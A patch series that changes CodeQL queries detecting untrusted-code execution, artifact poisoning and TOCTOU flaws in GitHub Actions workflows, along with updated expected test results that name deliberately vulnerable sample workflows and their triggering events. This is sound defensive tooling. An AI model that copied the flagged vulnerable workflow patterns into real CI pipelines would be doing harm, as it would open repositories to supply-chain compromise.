b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,16 +16,17 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and + event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 82c6f936c51..e4ab90e5fc2 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -16,10 +16,13 @@ import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph import codeql.actions.security.ControlChecks -from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event where ArtifactPoisoningFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index a50c47a9793..5f676052ef6 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -16,8 +16,9 @@ import actions import codeql.actions.security.PoisonableSteps import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download, KnownVulnerableAction vulnerable_action +from UsesStep download, KnownVulnerableAction vulnerable_action, Event event where + event = download.getEnclosingJob().getATriggerEvent() and vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( @@ -28,7 +29,7 @@ where // exists a poisonable upload artifact in the same workflow exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and - download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = poison and poison.getAFollowingStep() = upload and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 31a4cdf94e5..f9f95191795 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -25,8 +25,7 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(step, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and @@ -36,12 +35,13 @@ where check instanceof AssociationCheck or check instanceof PermissionCheck ) and - check.dominates(checkout) and - date_check.dominates(checkout) + check.dominates(step) and + date_check.dominates(step) ) or // not issue_comment triggered workflows not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) ) -select step, checkout, step, "Execution of untrusted code on a privileged workflow." +select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, + event.getLocation().getFile().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bc6f0e36e56..e130ba5dbb8 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,8 +23,7 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(checkout, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 8cc8e75c2af..66c68e882e2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -15,8 +15,6 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery -import codeql.actions.security.PoisonableSteps -import codeql.actions.security.ControlChecks from PRHeadCheckoutStep checkout where diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 609b09fdfef..3ad4e6915d2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -438,7 +438,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index afae2454078..006f365ae05 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -246,37 +246,42 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From e147a0bc710d449b0f05be16a2081beaca4744e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:26:31 +0200 Subject: [PATCH 0539/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 